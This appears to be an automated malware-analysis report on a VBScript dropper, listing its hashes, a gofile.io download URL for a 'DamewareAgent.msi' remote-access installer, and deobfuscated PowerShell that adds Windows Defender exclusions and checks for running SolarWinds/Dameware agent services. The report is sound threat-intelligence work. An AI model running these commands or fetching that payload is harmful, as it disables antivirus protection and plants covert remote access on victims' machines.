6d2d4e8753f3caa0145ce51bbb77947e
VBScript | MD5: 6d2d4e8753f3caa0145ce51bbb77947e | Size: 7.11 KB | text/vbscript

| Hash | Hash Value |
|---|---|
| MD5 | 6d2d4e8753f3caa0145ce51bbb77947e |
| Sha1 | 487a68869b213ec6bec2414c563144eea61c4b71 |
| Sha256 | 2d4cd81e04222bdbefa5f3cb4713941bba6de7a34833390e1689d1b00c6af71f |
| Sha384 | 3f83e08b421376d5f98eb42b0ee990e7e1b9e3d7da4620ba0b76d0e6dccba3e2ff77c0ec200a52f58b468fc3a36185a4 |
| Sha512 | cb7e85f6ea015e2cfe06b2aab71829d5ae6f7610ee1c06bc3c642417d8a30558de38b12f1906efaa60f3a20b4e713219f1606b81e4062eac025cc2c0bf1f5ae8 |
| SSDeep | 192:tuakZ4o/6/zc/e/3v7E/e/UBl7/yRGYIQ6/i/6Jsm/W:tuz+ZyqsQLV |
| TLSH | 0DE1974B610702B4C07386BBA576261EF86521675B891814FADD8691CF3CB2FF3F50EA |

| Config. Field | Value |
|---|---|
| Payload URI | & cacheBustedUrl & |
| Payload Destination | & tmpFile & |

| Config. Field | Value |
|---|---|
| Payload URI | & cachebustedurl & |
| Payload Destination | tmpfile & @( |

| Name | Value |
|---|---|
| URLs in VB Code - #1 | https://store-na-phx-5.gofile.io/download/direct/5c1b5bc3-6755-461a-86dd-10b822557c22/DamewareAgent.msi |
| Deobfuscated PowerShell | `Add-MpPreference -ExclusionPath @("$env:TEMP", "C:\Program Files\TacticalAgent", "C:\Program Files (x86)\DamewareRemoteEverywhere", "C:\ProgramData\TacticalAgent", "C:\Program Files\Mesh Agent")` |
| Deobfuscated PowerShell | `$s = Get-Service \| Where-Object $_."DisplayName" -like "*SolarWinds*" -or $_."DisplayName" -like "*Dameware Remote Everywhere Agent*" if ($s \| Where-Object $_."Status" -eq "Running") { exit 0 } else { exit 1 }` |

| Name | Value | Location |
|---|---|---|
| URLs in VB Code - #1 | https://store-na-phx-5.gofile.io/download/direct/5c1b5bc3-6755-461a-86dd-10b822557c22/DamewareAgent.msi | 6d2d4e8753f3caa0145ce51bbb77947e |
| Deobfuscated PowerShell | `Add-MpPreference -ExclusionPath @("$env:TEMP", "C:\Program Files\TacticalAgent", "C:\Program Files (x86)\DamewareRemoteEverywhere", "C:\ProgramData\TacticalAgent", "C:\Program Files\Mesh Agent")` Malicious | 6d2d4e8753f3caa0145ce51bbb77947e > 6d2d4e8753f3caa0145ce51bbb77947e.deobfuscated.vbs > [Command #0] > [PowerShell Command] |
| Deobfuscated PowerShell | `$s = Get-Service \| Where-Object $_."DisplayName" -like "*SolarWinds*" -or $_."DisplayName" -like "*Dameware Remote Everywhere Agent*" if ($s \| Where-Object $_."Status" -eq "Running") { exit 0 } else { exit 1 }` Malicious | 6d2d4e8753f3caa0145ce51bbb77947e > 6d2d4e8753f3caa0145ce51bbb77947e.deobfuscated.vbs > [Command #1] > [PowerShell Command] |